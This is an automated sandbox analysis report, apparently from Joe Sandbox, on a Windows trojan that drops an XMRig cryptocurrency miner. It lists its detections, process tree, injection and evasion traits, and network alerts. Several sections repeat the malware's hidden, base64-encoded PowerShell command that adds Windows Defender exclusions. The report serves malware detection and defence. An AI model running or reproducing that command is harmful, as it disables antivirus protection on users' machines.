Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe
Analysis ID:1546576
MD5:11b29218685a3c58cab85c9d39d52dce
SHA1:45eafe726262c18df3ac8d96ec8ecad979d3f9ca
SHA256:29c2b7c56ba64de00927c8aa2a4b41cead21000b709cb7470b6de6f2370c9178
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected PersistenceViaHiddenTask
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 6496 cmdline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WmiPrvSE.exe (PID: 1368 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • Target.exe (PID: 6616 cmdline: C:\Users\user\AppData\Roaming\XsdType\Target.exe MD5: 11B29218685A3C58CAB85C9D39D52DCE)
    • RegAsm.exe (PID: 7008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe MD5: A4EB36BAE72C5CB7392F2B85609D4A7E)
  • Target.exe (PID: 1544 cmdline: C:\Users\user\AppData\Roaming\XsdType\Target.exe MD5: 11B29218685A3C58CAB85C9D39D52DCE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
00000004.00000002.4115219254.000001DC43F58000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000000.00000002.1677637412.000001FC10306000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000003.00000002.1723437634.000001B0CAC76000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        00000000.00000002.1675197443.000001FC00346000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PersistenceViaHiddenTaskYara detected PersistenceViaHiddenTaskJoe Security
          00000000.00000002.1677637412.000001FC105D6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 19 entries
            SourceRuleDescriptionAuthorStrings
            3.2.Target.exe.1b0cabd63b0.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              3.2.Target.exe.1b0cac763e8.3.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exe.1fc10306308.2.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  9.2.Target.exe.1f51e355560.6.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    9.2.Target.exe.1f51e37d598.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 10 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\XsdType\Target.exe, ParentImage: C:\Users\user\AppData\Roaming\XsdType\Target.exe, ParentProcessId: 6616, ParentProcessName: Target.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe, ProcessId: 7008, ProcessName: RegAsm.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAG
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAG
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAG
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUA, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAWABzAGQAVAB5AHAAZQBcAFQAYQByAGcAZQB0AC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAG
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-01T06:22:13.241407+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449743TCP
                      2024-11-01T06:22:51.551333+010020229301A Network Trojan was detected20.109.210.53443192.168.2.449793TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: SecuriteInfo.com.Trojan.Inject4.56087.24588.10142.exeAvira: detected
                      Source: C:\Users\user\AppData\Roaming\XsdType\Target.exeAvira: detection malicious, Label: HEUR/AGEN.1358722
